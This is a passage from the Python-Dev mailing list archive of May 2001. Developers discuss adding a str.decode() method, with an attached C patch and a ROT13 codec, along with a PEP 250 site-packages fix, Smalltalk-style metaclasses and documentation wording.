don't contain a pointer to the corresponding function/method object?) Cheers /F From mal@lemburg.com Wed May 2 17:11:50 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Wed, 02 May 2001 18:11:50 +0200 Subject: [Python-Dev] Unicode and the Windows file system. References: <200105021702.MAA01317@cj20424-a.reston1.va.home.com> Message-ID: <3AF031C6.324D25D5@lemburg.com> Guido van Rossum wrote: > > > Now that 2.1 is out the door, how do we feel about getting these Unicode > > changes in? > > > > http://sourceforge.net/tracker/?func=detail&aid=410465&group_id=5470&atid=305470 > > No problem for me, although the context-sensitive semantics of the > MBCS encoding still elude me. (Who cares, it's Windows. :-) > > Are you & MAL capable of sorting this out? Do you want me to add a +1 > comment to the tracker? 
I'll take care of the parser marker stuff and Mark can do the rest ;-) -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From guido@digicool.com Wed May 2 18:17:50 2001 From: guido@digicool.com (Guido van Rossum) Date: Wed, 02 May 2001 12:17:50 -0500 Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: Your message of "Wed, 02 May 2001 17:47:08 +0200." <00a901c0d31f$2797a370$e46940d5@hagrid> References: <200105020122.NAA15982@s454.cosc.canterbury.ac.nz> <200105020248.VAA30315@cj20424-a.reston1.va.home.com> <038601c0d2f6$b6159770$e000a8c0@thomasnotebook> <200105021215.HAA31939@cj20424-a.reston1.va.home.com> <20010502085741.B515@gerg.ca> <200105021429.JAA32055@cj20424-a.reston1.va.home.com> <000d01c0d310$4ee127d0$0900a8c0@spiff> <05f101c0d311$1c91b5f0$e000a8c0@thomasnotebook> <002c01c0d312$6a195110$e46940d5@hagrid> <200105021537.LAA09063@localhost.localdomain> <00a901c0d31f$2797a370$e46940d5@hagrid> Message-ID: <200105021717.MAA01518@cj20424-a.reston1.va.home.com> > (any special reason why frame objects don't contain a > pointer to the corresponding function/method object?) Because (until now) there was no need. The frame needs to know about the code object, but the rest of the function's context is not needed. --Guido van Rossum (home page: http://www.python.org/~guido/) From mal@lemburg.com Wed May 2 19:13:17 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Wed, 02 May 2001 20:13:17 +0200 Subject: [Python-Dev] "data".decode(encoding) ?! Message-ID: <3AF04E3D.45AE4F4B@lemburg.com> We already have "data".encode(encoding) which encodes the string data by passing it through the encoder of the given encoding. Wouldn't it be worthwhile to add direct access to codec decoders through string methods as well ? (Note that this addition only makes sense for string objects, since Unicode cannot be decoded.) 
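For comparison, Python 3 kept the method pair only for text encodings (`str.encode()` and `bytes.decode()`). Bytes-to-bytes codecs such as `base64` and `zlib` are reached through `codecs.encode()` and `codecs.decode()` instead. A minimal sketch with an arbitrary payload:

```python
import codecs

payload = b"binary \x00\xff payload"

# Bytes-to-bytes codecs go through the codecs module functions.
as_base64 = codecs.encode(payload, "base64")
assert codecs.decode(as_base64, "base64") == payload

compressed = codecs.encode(payload, "zlib")
assert codecs.decode(compressed, "zlib") == payload

# Text encodings keep the str.encode() / bytes.decode() method pair.
text = "caf\u00e9"
assert text.encode("utf-8").decode("utf-8") == text

# bytes.decode() refuses codecs that do not produce text.
try:
    as_base64.decode("base64")
except LookupError as exc:
    print(exc)
```

The design keeps the symmetry Marc-Andre asks for (encode/decode with the same codec name) while limiting the string methods to conversions between text and bytes.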
Also, would there be any objections adding some more standard codecs to the system ? I'm thinking of wrapping the binascii module APIs in form of codecs... -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From guido@digicool.com Wed May 2 20:18:26 2001 From: guido@digicool.com (Guido van Rossum) Date: Wed, 02 May 2001 14:18:26 -0500 Subject: [Python-Dev] "data".decode(encoding) ?! In-Reply-To: Your message of "Wed, 02 May 2001 20:13:17 +0200." <3AF04E3D.45AE4F4B@lemburg.com> References: <3AF04E3D.45AE4F4B@lemburg.com> Message-ID: <200105021918.OAA03080@cj20424-a.reston1.va.home.com> > We already have "data".encode(encoding) which encodes the string data > by passing it through the encoder of the given encoding. > > Wouldn't it be worthwhile to add direct access to codec decoders > through string methods as well ? > > (Note that this addition only makes sense for string objects, > since Unicode cannot be decoded.) > > Also, would there be any objections adding some more standard > codecs to the system ? I'm thinking of wrapping the binascii > module APIs in form of codecs... Can you provide examples of where this can't be done using the existing approach? Code-bloat police anyone? --Guido van Rossum (home page: http://www.python.org/~guido/) From mal@lemburg.com Wed May 2 19:32:46 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Wed, 02 May 2001 20:32:46 +0200 Subject: [Python-Dev] "data".decode(encoding) ?! References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> Message-ID: <3AF052CE.E928BDA1@lemburg.com> Guido van Rossum wrote: > > > We already have "data".encode(encoding) which encodes the string data > > by passing it through the encoder of the given encoding. > > > > Wouldn't it be worthwhile to add direct access to codec decoders > > through string methods as well ? 
> > > > (Note that this addition only makes sense for string objects, > > since Unicode cannot be decoded.) > > > > Also, would there be any objections adding some more standard > > codecs to the system ? I'm thinking of wrapping the binascii > > module APIs in form of codecs... > > Can you provide examples of where this can't be done using the > existing approach? There is no existing elegant approach except hooking up to the codecs directly. Adding .decode() is really a matter of adding symmetry. Here are some example of how these two codec methods could be used: xmltext = binarydata.encode('base64') ... binarydata = xmltext.decode('base64') zzz = data.encode('gzip') ... data = zzz.decode('gzip') jpegimage = gifimage.decode('gif').encode('jpeg') mp3audio = wavaudio.decode('wav').encode('mp3') etc. Basically all content transfer encodings can take advantage of these two methods. It's not really code bloat, BTW, since the C API is there; the .decode() method would just expose it. -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From guido@digicool.com Wed May 2 20:38:10 2001 From: guido@digicool.com (Guido van Rossum) Date: Wed, 02 May 2001 14:38:10 -0500 Subject: [Python-Dev] "data".decode(encoding) ?! In-Reply-To: Your message of "Wed, 02 May 2001 20:32:46 +0200." <3AF052CE.E928BDA1@lemburg.com> References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> Message-ID: <200105021938.OAA03550@cj20424-a.reston1.va.home.com> > > Can you provide examples of where this can't be done using the > > existing approach? > > There is no existing elegant approach except hooking up to the > codecs directly. Adding .decode() is really a matter of adding > symmetry. Yes, but symmetry is good except when it isn't. 
:-) > Here are some example of how these two codec methods could > be used: > > xmltext = binarydata.encode('base64') > ... > binarydata = xmltext.decode('base64') > > zzz = data.encode('gzip') > ... > data = zzz.decode('gzip') > > jpegimage = gifimage.decode('gif').encode('jpeg') > > mp3audio = wavaudio.decode('wav').encode('mp3') > > etc. How would you do this currently? > Basically all content transfer encodings can take advantage of > these two methods. > > It's not really code bloat, BTW, since the C API is there; > the .decode() method would just expose it. Show me the patch and I'll decide whether it's code bloat. :-) --Guido van Rossum (home page: http://www.python.org/~guido/) From fredrik@effbot.org Wed May 2 19:20:24 2001 From: fredrik@effbot.org (Fredrik Lundh) Date: Wed, 2 May 2001 20:20:24 +0200 Subject: [Python-Dev] PEP 250 buglet Message-ID: <004b01c0d334$8f600a50$e46940d5@hagrid> PEP 250 suggests changing the sitedirs setup in site.py from sitedirs = [prefix] to sitedirs == [makepath(prefix, "lib", "site-packages")] on windows. it then goes on to say that This change does not preclude packages using the current location -- the change only adds a directory to sys.path, it does not remove anything. this isn't true (even after correcting the typo), since the sitedirs list isn't only added to the path; it's also used to look for PTH files. after this change, PTH files located under prefix will no longer be found. the following change works a bit better: sitedirs = [prefix, makepath(prefix, "lib", "site-packages")] Cheers /F From mal@lemburg.com Wed May 2 20:55:25 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Wed, 02 May 2001 21:55:25 +0200 Subject: [Python-Dev] "data".decode(encoding) ?! 
References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> Message-ID: <3AF0662D.48671B4E@lemburg.com> This is a multi-part message in MIME format. --------------891C60CC0A920DAE275D45C5 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Guido van Rossum wrote: > > > > Can you provide examples of where this can't be done using the > > > existing approach? > > > > There is no existing elegant approach except hooking up to the > > codecs directly. Adding .decode() is really a matter of adding > > symmetry. > > Yes, but symmetry is good except when it isn't. :-) > > > Here are some example of how these two codec methods could > > be used: > > > > xmltext = binarydata.encode('base64') > > ... > > binarydata = xmltext.decode('base64') > > > > zzz = data.encode('gzip') > > ... > > data = zzz.decode('gzip') > > > > jpegimage = gifimage.decode('gif').encode('jpeg') > > > > mp3audio = wavaudio.decode('wav').encode('mp3') > > > > etc. > > How would you do this currently? By looking up the codecs using the codec registry and then calling them directly. > > Basically all content transfer encodings can take advantage of > > these two methods. > > > > It's not really code bloat, BTW, since the C API is there; > > the .decode() method would just expose it. > > Show me the patch and I'll decide whether it's code bloat. :-) I've attached the patch. 
Due to a small reorganisation the patch is a little longer -- symmetry has its price at C level too ;-) -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ --------------891C60CC0A920DAE275D45C5 Content-Type: text/plain; charset=us-ascii; name="string.decode.patch" Content-Transfer-Encoding: 7bit Content-Disposition: inline; filename="string.decode.patch" --- CVS-Python/Include/stringobject.h Sat Feb 24 10:30:49 2001 +++ Dev-Python/Include/stringobject.h Wed May 2 21:05:12 2001 @@ -105,10 +105,19 @@ extern DL_IMPORT(PyObject*) PyString_AsE PyObject *str, /* string object */ const char *encoding, /* encoding */ const char *errors /* error handling */ ); +/* Decodes a string object and returns the result as Python string + object. */ + +extern DL_IMPORT(PyObject*) PyString_AsDecodedString( + PyObject *str, /* string object */ + const char *encoding, /* encoding */ + const char *errors /* error handling */ + ); + /* Provides access to the internal data buffer and size of a string object or the default encoded version of an Unicode object. Passing NULL as *len parameter will force the string buffer to be 0-terminated (passing a string with embedded NULL characters will cause an exception). 
*/ --- CVS-Python/Objects/stringobject.c Wed May 2 16:19:22 2001 +++ Dev-Python/Objects/stringobject.c Wed May 2 21:04:34 2001 @@ -138,42 +138,56 @@ PyString_FromString(const char *str) PyObject *PyString_Decode(const char *s, int size, const char *encoding, const char *errors) { - PyObject *buffer = NULL, *str; + PyObject *v, *str; + + str = PyString_FromStringAndSize(s, size); + if (str == NULL) + return NULL; + v = PyString_AsDecodedString(str, encoding, errors); + Py_DECREF(str); + return v; +} + +PyObject *PyString_AsDecodedString(PyObject *str, + const char *encoding, + const char *errors) +{ + PyObject *v; + + if (!PyString_Check(str)) { + PyErr_BadArgument(); + goto onError; + } if (encoding == NULL) encoding = PyUnicode_GetDefaultEncoding(); /* Decode via the codec registry */ - buffer = PyBuffer_FromMemory((void *)s, size); - if (buffer == NULL) - goto onError; - str = PyCodec_Decode(buffer, encoding, errors); - if (str == NULL) + v = PyCodec_Decode(str, encoding, errors); + if (v == NULL) goto onError; /* Convert Unicode to a string using the default encoding */ - if (PyUnicode_Check(str)) { - PyObject *temp = str; - str = PyUnicode_AsEncodedString(str, NULL, NULL); + if (PyUnicode_Check(v)) { + PyObject *temp = v; + v = PyUnicode_AsEncodedString(v, NULL, NULL); Py_DECREF(temp); - if (str == NULL) + if (v == NULL) goto onError; } - if (!PyString_Check(str)) { + if (!PyString_Check(v)) { PyErr_Format(PyExc_TypeError, "decoder did not return a string object (type=%.400s)", - str->ob_type->tp_name); - Py_DECREF(str); + v->ob_type->tp_name); + Py_DECREF(v); goto onError; } - Py_DECREF(buffer); - return str; + return v; onError: - Py_XDECREF(buffer); return NULL; } PyObject *PyString_Encode(const char *s, int size, @@ -1773,10 +1780,29 @@ string_encode(PyStringObject *self, PyOb return NULL; return PyString_AsEncodedString((PyObject *)self, encoding, errors); } +static char decode__doc__[] = +"S.decode([encoding[,errors]]) -> string\n\ +\n\ +Return a decoded 
string version of S. Default encoding is the current\n\ +default string encoding. errors may be given to set a different error\n\ +handling scheme. Default is 'strict' meaning that encoding errors raise\n\ +a ValueError. Other possible values are 'ignore' and 'replace'."; + +static PyObject * +string_decode(PyStringObject *self, PyObject *args) +{ + char *encoding = NULL; + char *errors = NULL; + if (!PyArg_ParseTuple(args, "|ss:decode", &encoding, &errors)) + return NULL; + return PyString_AsDecodedString((PyObject *)self, encoding, errors); +} + + static char expandtabs__doc__[] = "S.expandtabs([tabsize]) -> string\n\ \n\ Return a copy of S where all tab characters are expanded using spaces.\n\ If tabsize is not given, a tab size of 8 characters is assumed."; @@ -2347,10 +2373,11 @@ string_methods[] = { {"title", (PyCFunction)string_title, 1, title__doc__}, {"ljust", (PyCFunction)string_ljust, 1, ljust__doc__}, {"rjust", (PyCFunction)string_rjust, 1, rjust__doc__}, {"center", (PyCFunction)string_center, 1, center__doc__}, {"encode", (PyCFunction)string_encode, 1, encode__doc__}, + {"decode", (PyCFunction)string_decode, 1, decode__doc__}, {"expandtabs", (PyCFunction)string_expandtabs, 1, expandtabs__doc__}, {"splitlines", (PyCFunction)string_splitlines, 1, splitlines__doc__}, #if 0 {"zfill", (PyCFunction)string_zfill, 1, zfill__doc__}, #endif --------------891C60CC0A920DAE275D45C5-- From mal@lemburg.com Wed May 2 21:36:30 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Wed, 02 May 2001 22:36:30 +0200 Subject: [Python-Dev] "data".decode(encoding) ?! References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com> Message-ID: <3AF06FCE.854D4DF7@lemburg.com> This is a multi-part message in MIME format. 
--------------5800C85BDAA2AC1AD23ED42E
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

Here's a little fun codec to play with. It encodes the input using the ROT13 encoding (which is 1-1 and idempotent). The main difference over the existing codecs is that it returns a string rather than Unicode.

To install it, simply place it in some directory on your Python path.

Here's some sample output (Netscape can unscramble this BTW):

"""
Urer'f n yvggyr sha pbqrp gb cynl jvgu. Vg rapbqrf gur vachg hfvat gur EBG13 rapbqvat (juvpu vf 1-1 naq vqrzcbgrag). Gur znva qvssrerapr bire gur rkvfgvat pbqrpf vf gung vg ergheaf n fgevat engure guna Havpbqr.

Gb vafgnyy vg, fvzcyl cynpr vg va fbzr qverpgbel ba lbhe Clguba cngu.
"""

--
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting: http://www.egenix.com/
Python Software: http://www.lemburg.com/python/

--------------5800C85BDAA2AC1AD23ED42E
Content-Type: text/python; charset=us-ascii; name="rot_13.py"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline; filename="rot_13.py"

#!/usr/local/bin/python2.1
""" Python Character Mapping Codec for ROT13.

    See http://ucsub.colorado.edu/~kominek/rot13/ for details.

    Written by Marc-Andre Lemburg (mal@lemburg.com).

"""#"

import codecs

### Codec APIs

class Codec(codecs.Codec):

    def encode(self,input,errors='strict'):
        return codecs.charmap_encode(input,errors,encoding_map)

    def decode(self,input,errors='strict'):
        return codecs.charmap_decode(input,errors,decoding_map)

class StreamWriter(Codec,codecs.StreamWriter):
    pass

class StreamReader(Codec,codecs.StreamReader):
    pass

### encodings module API

def getregentry():
    return (Codec().encode,Codec().decode,StreamReader,StreamWriter)

### Decoding Map

decoding_map = codecs.make_identity_dict(range(256))
decoding_map.update({
    0x0041: 0x004e, 0x0042: 0x004f, 0x0043: 0x0050, 0x0044: 0x0051,
    0x0045: 0x0052, 0x0046: 0x0053, 0x0047: 0x0054, 0x0048: 0x0055,
    0x0049: 0x0056, 0x004a: 0x0057, 0x004b: 0x0058, 0x004c: 0x0059,
    0x004d: 0x005a, 0x004e: 0x0041, 0x004f: 0x0042, 0x0050: 0x0043,
    0x0051: 0x0044, 0x0052: 0x0045, 0x0053: 0x0046, 0x0054: 0x0047,
    0x0055: 0x0048, 0x0056: 0x0049, 0x0057: 0x004a, 0x0058: 0x004b,
    0x0059: 0x004c, 0x005a: 0x004d, 0x0061: 0x006e, 0x0062: 0x006f,
    0x0063: 0x0070, 0x0064: 0x0071, 0x0065: 0x0072, 0x0066: 0x0073,
    0x0067: 0x0074, 0x0068: 0x0075, 0x0069: 0x0076, 0x006a: 0x0077,
    0x006b: 0x0078, 0x006c: 0x0079, 0x006d: 0x007a, 0x006e: 0x0061,
    0x006f: 0x0062, 0x0070: 0x0063, 0x0071: 0x0064, 0x0072: 0x0065,
    0x0073: 0x0066, 0x0074: 0x0067, 0x0075: 0x0068, 0x0076: 0x0069,
    0x0077: 0x006a, 0x0078: 0x006b, 0x0079: 0x006c, 0x007a: 0x006d,
})

### Encoding Map

encoding_map = {}
for k,v in decoding_map.items():
    encoding_map[v] = k

### Filter API

def rot13(infile, outfile):
    outfile.write(infile.read().encode('rot-13'))

if __name__ == '__main__':
    import sys
    rot13(sys.stdin, sys.stdout)

--------------5800C85BDAA2AC1AD23ED42E--

From guido@digicool.com Wed May 2 23:11:07 2001
From: guido@digicool.com (Guido van Rossum)
Date: Wed, 02 May 2001 17:11:07 -0500
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: Your message of "Wed, 02 May 2001 13:12:21 +0200."
<03d301c0d2f8$c29d3960$e000a8c0@thomasnotebook>
References: <200105020052.TAA24315@cj20424-a.reston1.va.home.com> <03d301c0d2f8$c29d3960$e000a8c0@thomasnotebook>
Message-ID: <200105022211.RAA05242@cj20424-a.reston1.va.home.com>

> [From Jim Althoff]
> > In the list below, indentation indicates class hierarchy (superclass --
> > subclass)
> The indentation, unfortunately, seems to be destroyed.
[...]
> A question for Jim (this is more Smalltalk than Python related):
> How does the Behaviour class fit into this picture?

Jim responded with a much clearer diagram, and as a bonus an answer to your question about Behaviour!

> Hi Guido,
>
> Sorry about the mangled diagram. It's kind of tricky doing this with just
> text. :-) Anyway, below is a -- hopefully -- improved diagram and
> description.
>
> At the very bottom is an answer to the question about "Behavior".
>
> Jim
>
> ==========================================
>
> Smalltalk-80 (simplified) class/metaclass structure:
>
> Terminology:
>   o A "class" is an object that can be instantiated.
>   o A "metaclass" is a class and is one such that when _it_ is instantiated
>     _that_ instance is _itself_ a class (which can be instantiated).
>     (A metaclass is a specialization of class).
>
> Essentially, there are two parallel hierarchies: 1) the class hierarchy
> and 2) the metaclass hierarchy. The class hierarchy starts with class
> Object. The metaclass hierarchy starts right below Class with the
> metaclass ObjectMetaClass.
>
>
>   o Object
>       o Class
>           o MetaClass
>           o ObjectMetaClass
>               o ClassMetaClass
>                   o MetaClassMetaClass
>
> Object is the top of the class hierarchy (and total hierarchy). It has no
> superclass. It is the only class that has no superclass.
> Class is a subclass of Object.
> MetaClass is a subclass of Class.
>
> ObjectMetaClass is also a subclass of Class.
> ClassMetaClass is a subclass of ObjectMetaClass.
> MetaClassMetaClass is a subclass of ClassMetaClass.
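The parallel hierarchy described above can be imitated with Python 3 metaclasses, which arrived well after this thread. What follows is a minimal sketch that assumes Python 3 syntax. BaseMeta, Base, RectangleMeta and Rectangle are hypothetical stand-ins for ObjectMetaClass, Object and an application class; they are not names from Smalltalk or from any Python proposal. Methods defined on the metaclass behave like Smalltalk class methods: they can be called on the class but are invisible from its instances.

```python
class BaseMeta(type):
    """Plays the role of ObjectMetaClass: class-side methods of Base live here."""
    def describe(cls):
        return "class " + cls.__name__

class Base(metaclass=BaseMeta):
    pass

class RectangleMeta(BaseMeta):
    """Parallels the class tree: subclasses the metaclass of the parent class."""
    def unit(cls):
        # A class-side method: called on the class, it builds an instance.
        return cls(1, 1)

class Rectangle(Base, metaclass=RectangleMeta):
    def __init__(self, width, height):
        self.width, self.height = width, height

    def area(self):
        return self.width * self.height

# Two parallel hierarchies: the classes and their metaclasses.
assert issubclass(Rectangle, Base) and issubclass(RectangleMeta, BaseMeta)
assert type(Rectangle) is RectangleMeta            # Rectangle is an instance of its metaclass
assert Rectangle.unit().area() == 1                # class method found via the metaclass
assert Rectangle.describe() == "class Rectangle"   # inherited along the metaclass chain
assert not hasattr(Rectangle(2, 3), "unit")        # instances do not see class-side methods
assert type(type) is type                          # Python's own circular knot at the top
```

One difference from Smalltalk-80 is that Python does not create a metaclass per class automatically. Most classes share type as their metaclass, and classmethod is the usual way to get class-side behaviour without writing one.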
>
> Adding in application classes Rectangle and SpamRectangle then might look
> like:
>
>
>   o Object
>       o Class
>           o MetaClass
>           o ObjectMetaClass
>               o ClassMetaClass
>                   o MetaClassMetaClass
>               o RectangleMetaClass
>                   o SpamRectangleMetaClass
>       o Rectangle
>           o SpamRectangle
>
> Rectangle is a subclass of Object.
> SpamRectangle is a subclass of Rectangle.
>
> RectangleMetaClass is a subclass of ObjectMetaClass.
> SpamRectangleMetaClass is a subclass of RectangleMetaClass.
>
> Rectangle is an instance of RectangleMetaClass.
> SpamRectangle is an instance of SpamRectangleMetaClass.
> (SpamRectangleMetaClass is an instance of MetaClass.)
>
> The next list shows both the subclass- and the instanceOf- relationships
> between classes and metaclasses.
>
> In this list a class listed below another class is a subclass of it.
> SpamMC is an abbreviation for SpamMetaClass (the metaclass of class Spam --
> the class of which class Spam is an instance).
>
>                          Class
>   Object     instanceOf  ObjectMC     instanceOf  MetaClass
>   Class      instanceOf  ClassMC      instanceOf  MetaClass
>   MetaClass  instanceOf  MetaClassMC  instanceOf  MetaClass
>
> ObjectMetaClass, ClassMetaClass, and MetaClassMetaClass are all instances
> of MetaClass.
>
> MetaClass is an instance of MetaClassMetaClass. But MetaClassMetaClass is
> an instance of MetaClass. So this particular relationship is circular.
> (In Smalltalk-76, Class was an instance of itself.)
>
> Application classes would have a similar, parallel hierarchy between
> classes and their associated metaclasses. For example:
>
>   Object         instanceOf  ObjectMC         instanceOf  MetaClass
>   Rectangle      instanceOf  RectangleMC      instanceOf  MetaClass
>   SpamRectangle  instanceOf  SpamRectangleMC  instanceOf  MetaClass
>
> When you create class SpamRectangle as a subclass of class Rectangle, the
> code in the class-creation method first creates the metaclass
> SpamRectangleMetaClass -- by instantiating MetaClass -- as a subclass of
> RectangleMetaClass.
> The code then creates the SpamRectangle class as an
> instance of the SpamRectangleMetaClass metaclass it just created.
>
> You can then create instances of class SpamRectangle.
>
> SpamRectangle "instance methods" reside in the method dict of
> SpamRectangle.
> SpamRectangle "class methods" reside in the method dict of
> SpamRectangleMetaClass.
>
> ============================
>
> Regarding Thomas' question:
>
> The Smalltalk-80 class hierarchy actually has a bit more factoring than
> what I show above. In particular, Class and MetaClass are subclasses of
> the class ClassDescription. ClassDescription is a subclass of class
> Behavior. Behavior is a subclass of Object.
>
> So it looks like:
>
>
>   o Object
>       o Behavior
>           o ClassDescription
>               o MetaClass
>               o Class
>                   o ObjectMetaClass
>                       o BehaviorMetaClass
>                           o ClassDescriptionMetaClass
>                               o MetaClassMetaClass
>                               o ClassMetaClass
>
> Class Behavior basically abstracts the creation and handling of method
> dict.s. Class ClassDescription factors out common, reusable code between
> MetaClass and Class. Clearly there are a number of ways of designing (or
> over-designing) this part of the hierarchy. The key idea, though,
> was to use the subclassing mechanism as a way of supporting specialized
> class methods.
>
> =============================

--Guido van Rossum (home page: http://www.python.org/~guido/)

From tim.one@home.com Wed May 2 22:24:28 2001
From: tim.one@home.com (Tim Peters)
Date: Wed, 2 May 2001 17:24:28 -0400
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Doc/lib libfuncs.tex,1.76,1.77
In-Reply-To:
Message-ID:

[Fred L. Drake]
> Update the filter() and list() descriptions to include information
> about the support for containers and iteration.
> ...
>   \begin{funcdesc}{list}{sequence}
> ! Return a list whose items are the same and in the same order as
> ! \var{sequence}'s items. \var{sequence} may be either a sequence,
> ! a container that supports iteration, or an iterator object.
> ...
[and similarly for filter()] Before we repeat this last incantation umpteen more times in the docs, is this how we want it to read in the end? The truth of the implementation and of the design is that "sequence" is any object that supports iteration, period (if PyObject_GetIter(op) succeeds, list(op) etc are happy, else they raise TypeError). "A sequence" and "an iterator object" *always* support iteration, so naming them too appears to draw a distinction that doesn't exist. Suggested alternative: \var{sequence} must support iteration (see XXX). where XXX is common boilerplate explaining what "support iteration" means, and that sequences and iterator objects are just particular cases of that. Note that this boilerplate may expand to include generators too before 2.2 is real, and a generator isn't really "a container that supports iteration" (the word "container" is a strain in the generator context). That is, a long-winded incantation is just going to get longer over time, and if it's repeated umpteen places in the docs I doubt they'll all get updated when needed. From michel@digicool.com Wed May 2 22:43:42 2001 From: michel@digicool.com (Michel Pelletier) Date: Wed, 2 May 2001 14:43:42 -0700 (PDT) Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: <200105022211.RAA05242@cj20424-a.reston1.va.home.com> Message-ID: On Wed, 2 May 2001, Guido van Rossum wrote: > > > > o Object > > o Class > > o MetaClass > > o ObjectMetaClass > > o ClassMetaClass > > o MetaClassMetaClass > > > > Object is the top of the class hierarchy (and total hierarchy). It has no > > superclass. It is the only class that has no superclass. > > Class is a subclass of Object. > > MetaClass is a subclass of Class. > > > > ObjectMetaClass is also a subclass of Class. > > ClassMetaClass is a subclass of ObjectMetaClass. > > MetaClassMetaClass is a subclass of ClassMetaClass. Does this go on ad infinitum? 
i.e., is there a ClassMetaClassMetaClass which subclasses MetaClassMetaClass and so on? I was under the impression from talking to JimF that Smalltalk eventually stopped at a class that is a subclass of itself. -Michel From greg@cosc.canterbury.ac.nz Thu May 3 02:35:29 2001 From: greg@cosc.canterbury.ac.nz (Greg Ewing) Date: Thu, 03 May 2001 13:35:29 +1200 (NZST) Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: <3AEFCEBD.2E5979C9@lemburg.com> Message-ID: <200105030135.NAA16449@s454.cosc.canterbury.ac.nz> "M.-A. Lemburg" : > I'm not sure I can follow you here: DictType.__repr__ is the > representation method of the dictionary and not inherited > from TypeType, so there should be no problem. The problem is that DictType.__repr__ could mean either the unbound method for finding the repr of a dictionary, or the bound method for finding the repr of DictType itself. This ambiguity is inherent in the Python language as soon as you try to make classes into instances (which you have to do as a consequence of making types into classes). Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg@cosc.canterbury.ac.nz +--------------------------------------+ From greg@cosc.canterbury.ac.nz Thu May 3 04:15:41 2001 From: greg@cosc.canterbury.ac.nz (Greg Ewing) Date: Thu, 03 May 2001 15:15:41 +1200 (NZST) Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: Message-ID: <200105030315.PAA16465@s454.cosc.canterbury.ac.nz> Michel Pelletier : > I was under the impression > from talking to JimF that Smalltalk eventually stopped at a class > that is a subclass of itself. Some years ago, while playing with Sun's Postscript-based NeWS window system, I devised an OO language (called P) that got translated into PostScript.
It had a very Smalltalk-like class/metaclass system, although rather simpler than what JimF described. As I remember, the kernel consisted of a little knot of about 6 classes with some interesting incestuous relationships between them. If anyone's interested, I could dig out the code and provide details of how it all worked. There might be some ideas that could be used in Python. (Programming in P felt a lot like programming in Python, by the way. If my name had been Guido, who knows where it might have led!) Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg@cosc.canterbury.ac.nz +--------------------------------------+ From greg@cosc.canterbury.ac.nz Thu May 3 04:25:12 2001 From: greg@cosc.canterbury.ac.nz (Greg Ewing) Date: Thu, 03 May 2001 15:25:12 +1200 (NZST) Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: <3AEFF710.9471.8025D7EA@localhost> Message-ID: <200105030325.PAA16469@s454.cosc.canterbury.ac.nz> Gordon McMillan : > I would like to see ... some discussion of the expected > pragmatic benefits. (That's a different topic from subclassing > types.) Actually, it's not -- the two issues are connected. Suppose we succeed in unifying types and classes. Then instead of classes being of type ClassType, they are now instances of ClassClass. So classes are also instances, or in other words, we have unified classes and instances. So even if we don't go as far as adding Smalltalk-style class-methods-via-metaclasses, we still have to deal with the fact that some things will be both classes and instances. Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. 
| greg@cosc.canterbury.ac.nz +--------------------------------------+ From greg@cosc.canterbury.ac.nz Thu May 3 04:27:34 2001 From: greg@cosc.canterbury.ac.nz (Greg Ewing) Date: Thu, 03 May 2001 15:27:34 +1200 (NZST) Subject: [Python-Dev] Classes and Metaclasses in Smalltalk In-Reply-To: <200105021523.KAA32340@cj20424-a.reston1.va.home.com> Message-ID: <200105030327.PAA16472@s454.cosc.canterbury.ac.nz> Guido: > Actually, I think that what's in the __dict__ is just perfect I was thinking of backwards compatibility for people who are hacking the __dict__ of a class directly. If you don't care about that, the problem is simpler. Greg Ewing, Computer Science Dept, +--------------------------------------+ University of Canterbury, | A citizen of NewZealandCorp, a | Christchurch, New Zealand | wholly-owned subsidiary of USA Inc. | greg@cosc.canterbury.ac.nz +--------------------------------------+ From greg@cosc.canterbury.ac.nz Thu May 3 04:39:08 2001 From: greg@cosc.canterbury.ac.nz (Greg Ewing) Date: Thu, 03 May 2001 15:39:08 +1200 (NZST) Subject: IDEA for super (Re: [Python-Dev] Classes and Metaclasses in Smalltalk) In-Reply-To: <200105021511.KAA32271@cj20424-a.reston1.va.home.com> Message-ID: <200105030339.PAA16476@s454.cosc.canterbury.ac.nz> Guido: > Will we need to add a "::" operator to Python??? If so, I hope we can find a syntax that doesn't 